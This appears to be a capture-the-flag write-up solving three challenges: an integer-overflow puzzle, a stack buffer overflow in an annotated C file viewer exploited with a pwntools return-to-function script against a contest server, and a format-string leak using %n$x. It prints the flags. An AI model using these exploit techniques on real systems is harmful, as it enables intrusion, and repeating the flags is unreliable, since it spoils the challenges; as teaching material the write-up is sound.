It looks like we need an integer overflow so that a doubled number comes out as exactly -100. The maximum positive 32-bit signed integer is 2147483647, so from there just work backwards to get -100.
Flag: flag{double_or_nothing_406c561}
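/**
 * Print the value of the FLAG environment variable on stdout.
 *
 * This function is not called from main() in this listing; it is only
 * reachable if control flow is redirected to it.
 *
 * @return 0 when the flag was printed, 1 when FLAG is not set.
 */
int flag() {
    const char *value = getenv("FLAG");

    if (value == NULL) {
        /* puts(NULL) is undefined behaviour, so bail out when FLAG is unset. */
        return 1;
    }

    puts(value);
    /* The original fell off the end of a non-void function; return explicitly. */
    return 0;
}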
/*
 * Challenge program: a minimal line-driven file viewer.
 *
 * Commands are read from stdin one line at a time and dispatched on the
 * first character:
 *   Q        return from main
 *   f NAME   set the current file name (text starting at input[2]), then echo it
 *   l        print the current file line by line
 * Any other input prints "?". argv[1], when present, seeds the file name.
 *
 * NOTE(review): this listing is kept exactly as distributed because the
 * writeup analyses it. The two out-of-bounds writes are marked below together
 * with the change a maintainer would make.
 */
int main(int argc, char** argv) {
    char input[24];           /* command buffer: 24 bytes */
    char filename[24] = "\0"; /* current file name; the initializer zero-fills all 24 bytes */
    char buffer[64];          /* one line of file content */
    FILE* f = NULL;
    /* Mode 2 is presumably _IONBF (unbuffered, as on glibc); confirm and prefer the named constant. */
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
    if (argc > 1) {
        /* At most 23 bytes are copied, so the zero-filled last byte keeps filename terminated. */
        strncpy(filename, argv[1], 23);
    }
    while (1) {
        /*
         * BUG (stack buffer overflow): the size passed is 64 but input holds
         * only 24 bytes, so a single line can write up to 40 bytes past the
         * end of input. Fix: fgets(input, sizeof input, stdin).
         * The return value is also ignored, so EOF or a read error goes
         * unnoticed and the loop keeps acting on whatever input contains.
         */
        fgets(input, 64, stdin);
        /* Cut the line at the first newline, if there is one. */
        input[strcspn(input, "\n")] = 0;
        if (input[0] == 'Q') {
            /* Only return path out of main, i.e. where the saved return address is used. */
            return 0;
        } else if (input[0] == 'f') {
            /* input[1] is never inspected; the name is whatever starts at input[2]. */
            if (strlen(input) >= 3) {
                /*
                 * BUG (second out-of-bounds write): unbounded copy. With the
                 * fgets size above the source can be up to 61 characters,
                 * while filename holds 24 bytes. Fix: a bounded copy such as
                 * snprintf(filename, sizeof filename, "%s", input + 2).
                 */
                strcpy(filename, input + 2);
            }
            if (filename[0] == '\0') {
                puts("?");
            } else {
                puts(filename);
            }
        } else if (input[0] == 'l') {
            if (filename[0] == '\0') {
                puts("?");
            } else {
                /*
                 * The only path restriction: names containing '/' are refused.
                 * Any other name is opened relative to the current working
                 * directory.
                 */
                if (strchr(filename, '/') != NULL) {
                    puts("?");
                    continue;
                }
                f = fopen(filename, "r");
                if (f == NULL) {
                    puts("?");
                    continue;
                }
                /* Here the size passed to fgets matches buffer's 64 bytes. */
                while (fgets(buffer, 64, f)) {
                    /* Fixed "%s" format: file content is never used as a format string. */
                    printf("%s", buffer);
                }
                fclose(f);
            }
        } else {
            puts("?");
        }
    }
}
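There is a buffer overflow that lets us return to the flag function: fgets(input, 64, stdin) reads up to 64 bytes into the 24-byte input buffer.
Sending an overlong line crashed the program; the offset to the return address is 40. A quick script run against the server gives the flag.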
from pwn import *
# Values taken from the writeup: the padding length found from the crash and
# the address placed after it (presumably flag() in the challenge binary).
PAD_LEN = 40
TARGET_ADDR = 0x00000000004011d2

conn = remote("ed.hsctf.com", 1337)

# One overlong line: padding followed by the 8-byte little-endian address.
payload = b"A" * PAD_LEN + p64(TARGET_ADDR)
conn.sendline(payload)
conn.recv()  # the line starts with 'A', so the program answers "?"

# 'Q' is the command that makes main() return.
conn.sendline(b"Q")
print(conn.recv())
Flag: flag{real_programmers_use_butterflies}
A simple format string bug. I extracted the flag using %n$x,
where n is a positive integer (1, 2, 3, ...), and decoded the hex output using CyberChef.
At the 14th element, the flag was complete.
Flag: flag{cats_go_meow}